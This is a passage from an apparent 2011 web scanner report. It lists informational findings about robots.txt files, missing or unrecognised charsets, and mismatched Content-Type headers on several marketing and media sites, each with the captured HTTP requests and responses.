Expires: Sun, 15 May 2011 16:53:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

21.16. http://www.insidefacebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidefacebook.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insidefacebook.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 16:52:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidefacebook.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

21.17. http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insidemobileapps.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 16:53:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

21.18. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rightscale.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 15 May 2011 13:02:16 GMT
ETag: "10150f-2c-25ef6600"
Accept-Ranges: bytes
Content-Length: 44
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /v1/
Disallow: /dev/

21.19. http://www.shoutlet.com/features/landingpage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/features/landingpage.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoutlet.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:11:29 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Mon, 18 Oct 2010 15:17:37 GMT
ETag: "468319-25e-ad26a640"
Accept-Ranges: bytes
Content-Length: 606
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
# these pages gone or elsewhere after redesign
Disallow: /about/careers/
Disallow: /about/news.php
Disallow: /about/resellers.php
Disallow: /blog/forum/
Disallow: /campaign.php

...[SNIP]...

21.20. http://www.youtube.com/v/m0UQucWM0Zw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/v/m0UQucWM0Zw

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:00:24 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:37 GMT
ETag: "21b-4a32038f98440"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

22. HTML does not specify charset previous next
There are 10 instances of this issue:

http://cdn.shoutlet.com/static/flash/swfjs/
http://cdn.shoutlet.com/widgets/
http://www.criteo.com/
http://www.hubspot.com/portals/53/skins/hubspot/search.html
http://www.insidefacebook.com/adtracker2/ads.php
http://www.shoutlet.com/favicon.ico
http://www.shoutlet.com/features/landingpage.php
http://www.shoutlet.com/js/prototype.js
http://www.shoutlet.com/static/js/external.js
http://www.shoutlet.com/static/js/swfobject.js

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

22.1. http://cdn.shoutlet.com/static/flash/swfjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/static/flash/swfjs/

Request

Response

22.2. http://cdn.shoutlet.com/widgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/widgets/

Request

Response

22.3. http://www.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/

Request

Response

22.4. http://www.hubspot.com/portals/53/skins/hubspot/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/portals/53/skins/hubspot/search.html

Request

Response

22.5. http://www.insidefacebook.com/adtracker2/ads.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidefacebook.com
Path:	/adtracker2/ads.php

Request

GET /adtracker2/ads.php?a=108&c=1&s=1 HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 192

<html><head><meta http-equiv='refresh' content='0;url=http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200' /> </head></html>

22.6. http://www.shoutlet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:11:36 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 16 Apr 2008 18:41:09 GMT
ETag: "470321-508-dc3edb40"
Accept-Ranges: bytes
Content-Length: 1288
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
<script type="text/javascript">
window.onload = function(){
   var q_str = "";
   switch(window.location.pathname){
   case "/forum":
   case "/forums":
   case "/foru
...[SNIP]...

22.7. http://www.shoutlet.com/features/landingpage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/features/landingpage.php

Request

Response

22.8. http://www.shoutlet.com/js/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/js/prototype.js

Request

GET /js/prototype.js HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:13:07 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 16 Apr 2008 18:41:09 GMT
ETag: "470321-508-dc3edb40"
Accept-Ranges: bytes
Content-Length: 1288
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
<script type="text/javascript">
window.onload = function(){
   var q_str = "";
   switch(window.location.pathname){
   case "/forum":
   case "/forums":
   case "/foru
...[SNIP]...

22.9. http://www.shoutlet.com/static/js/external.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/static/js/external.js

Request

GET /static/js/external.js HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:13:05 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Wed, 16 Apr 2008 18:41:09 GMT
ETag: "470321-508-dc3edb40"
Accept-Ranges: bytes
Content-Length: 1288
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
<script type="text/javascript">
window.onload = function(){
   var q_str = "";
   switch(window.location.pathname){
   case "/forum":
   case "/forums":
   case "/foru
...[SNIP]...

22.10. http://www.shoutlet.com/static/js/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shoutlet.com
Path:	/static/js/swfobject.js

Request

GET /static/js/swfobject.js HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

23. HTML uses unrecognised charset previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://community.invisionpower.com
Path:	/index.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

Request

Response

24. Content type incorrectly stated previous next
There are 15 instances of this issue:

http://a3.twimg.com/profile_images/357754763/cross_normal.gif
http://affiliate.invisionpower.com/scripts/track.php
http://cdn.shoutlet.com/static/flash/swfjs/
http://cdn.shoutlet.com/widgets/
http://chat.livechatinc.net/licence/1043255/script.cgi
http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js
http://frimastudio.com/favicon.ico
http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico
http://hubspot.app1.hubspot.com/salog.js.aspx
http://s3.amazonaws.com/appdata-pro/app_icons/14400961/original.jpg
http://www.conversionruler.com/bin/tracker.php
http://www.criteo.com/components/com_joomfish/images/flags/au.gif
http://www.insidefacebook.com/favicon.ico
http://www.shoutlet.com/static/img/logos/favicon.ico
http://www.votigo.com/favicon.ico

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://a3.twimg.com/profile_images/357754763/cross_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a3.twimg.com
Path:	/profile_images/357754763/cross_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/357754763/cross_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:26 GMT
Expires: Wed, 15 May 2019 14:36:15 GMT
Last-Modified: Tue, 11 Aug 2009 23:00:38 GMT
Cache-Control: max-age=252460800
Content-Type: image/gif
ETag: "47a1d9d09131bd67995f47c584a16e17"
Server: AmazonS3
X-Amz-Cf-Id: 6915486c3b550282d790bcb845404be51b08a2024f0c21480021f895148e0b3af134efb0d591e2a3,fc1f534f2171bac1fc6026ddcbf3a051f7c672b7bcd04bfeb42acbd20fa475fcc1e413f58288d14b
x-amz-id-2: /KlKBjcScVep82iI0RSgzvSngUblBSXQrHNkMoar/D809Fz3Owk6oSl17CQw0JKj
x-amz-request-id: 45182FA0C8C9A08E
X-Cache: Miss from cloudfront
Content-Length: 3543

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W..tIDATX.......u...wO.hgw......m%!..Z.........T.....1U....k.R.T......P..c0....BB .Zi..Jhw..o=3........ $X .....uj.>s....=?(
...[SNIP]...

24.2. http://affiliate.invisionpower.com/scripts/track.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://affiliate.invisionpower.com
Path:	/scripts/track.php

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /scripts/track.php?url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2F&referrer=&getParams=&anchor=&cookies= HTTP/1.1
Host: affiliate.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: maan_session_id=842de12878eb0d7b8c65162df86685ee; __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.1.10.1305476763

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC"
Content-Length: 48
Content-Type: application/x-javascript

setVisitor('d3ef752b05ff763fca0c683d00J3AD1D');

24.3. http://cdn.shoutlet.com/static/flash/swfjs/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.shoutlet.com
Path:	/static/flash/swfjs/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.4. http://cdn.shoutlet.com/widgets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.shoutlet.com
Path:	/widgets/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.5. http://chat.livechatinc.net/licence/1043255/script.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://chat.livechatinc.net
Path:	/licence/1043255/script.cgi

Issue detail

The response contains the following Content-type statement:

Content-type: application/x-javascript;

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

24.6. http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://community.invisionpower.com
Path:	/public/js/3rd_party/prettify/lang-sql.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /public/js/3rd_party/prettify/lang-sql.js HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.1.10.1305476788; cforums_session_id=00ab541548e39922d16233c04a35f3d4; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 04 May 2010 17:17:42 GMT
ETag: "6c3-485c7e31a9980"
Accept-Ranges: bytes
Content-Length: 1731
Cache-Control: max-age=31536000
Expires: Mon, 14 May 2012 16:26:30 GMT
Content-Type: application/javascript

PR.registerLangHandler(PR.createSimpleLexer([[PR.PR_PLAIN,/^[\t\n\r \xA0]+/,null,' \n\r \xa0'],[PR.PR_STRING,/^(?:"(?:[^\"\\]|\\.)*"|'(?:[^\'\\]|\\.)*')/,null,'\"\'']],[[PR.PR_COMMENT,/^(?:--[^\r\n]*|
...[SNIP]...

24.7. http://frimastudio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://frimastudio.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: frimastudio.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4bab8e3705728426796220375620e3b6; langue=en; auto_mobile_redirected=1; __utmz=65236601.1305478405.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=65236601.1121164573.1305478405.1305478405.1305478405.1; __utmc=65236601; __utmb=65236601.2.10.1305478405

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:29 GMT
Server: Apache
Last-Modified: Mon, 26 Jul 2010 15:02:01 GMT
ETag: "16554ff-47e-48c4baab0ec40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..................................................................f...........................................................f...f......3........................f
...[SNIP]...

24.8. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /facebook/wp-content/themes/emire/images/favicon.ico HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Apr 2010 09:10:44 GMT
ETag: "2fe8778-47e-2b8aed00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ..............................................................................................eD..cC..`B..`B..`B..`B..`B..`B..`B..`B..`B..`B..`B..`B..`B......jE..f
...[SNIP]...

24.9. http://hubspot.app1.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hubspot.app1.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.10. http://s3.amazonaws.com/appdata-pro/app_icons/14400961/original.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s3.amazonaws.com
Path:	/appdata-pro/app_icons/14400961/original.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /appdata-pro/app_icons/14400961/original.jpg HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 01EFnAieXh0AdHDobVn4GQhPIwGBuNwGDR0MGjydsGq8oXF51FVlBu3ycBPJU7A6
x-amz-request-id: 599F988B958C8D52
Date: Sun, 15 May 2011 16:52:13 GMT
Last-Modified: Mon, 02 May 2011 20:54:12 GMT
ETag: "8cf55eb8a4e0d8b88afae81bfa20049b"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 1402
Server: AmazonS3

GIF89a/.!..A..j..m.
n..t.|..y..|.......(..(..3..5..<.......................*..)..9..F..P..Y..e..F..W..G..W..g..f..l..n..p..z..w........................................................................
...[SNIP]...

24.11. http://www.conversionruler.com/bin/tracker.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.conversionruler.com
Path:	/bin/tracker.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

24.12. http://www.criteo.com/components/com_joomfish/images/flags/au.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/au.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

Response

24.13. http://www.insidefacebook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.insidefacebook.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=78842188.1305478335.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=78842188.796901433.1305478335.1305478335.1305478335.1; __utmc=78842188; __utmb=78842188.1.10.1305478335

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Feb 2010 20:17:05 GMT
ETag: "29c17d0-4486-e6e93240"
Accept-Ranges: bytes
Content-Length: 17542
Content-Type: text/plain

......00.... ..%..F... .... ......%........ .. ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...

24.14. http://www.shoutlet.com/static/img/logos/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.shoutlet.com
Path:	/static/img/logos/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /static/img/logos/favicon.ico HTTP/1.1
Host: www.shoutlet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.2.10.1305478395

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:13:12 GMT
Server: Apache/2.2.6 (Fedora)
Last-Modified: Thu, 07 Apr 2011 12:12:31 GMT
ETag: "6c8131-47e-60ba9c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(......."..... .........................G.[.G.[.G.[/................................................G.[.G.[.G.[.G.[.G.[_G.[OG.[G.[G.[G.[oG.[.................G.[_G.[.G.[.G.[.G.
...[SNIP]...

24.15. http://www.votigo.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.votigo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
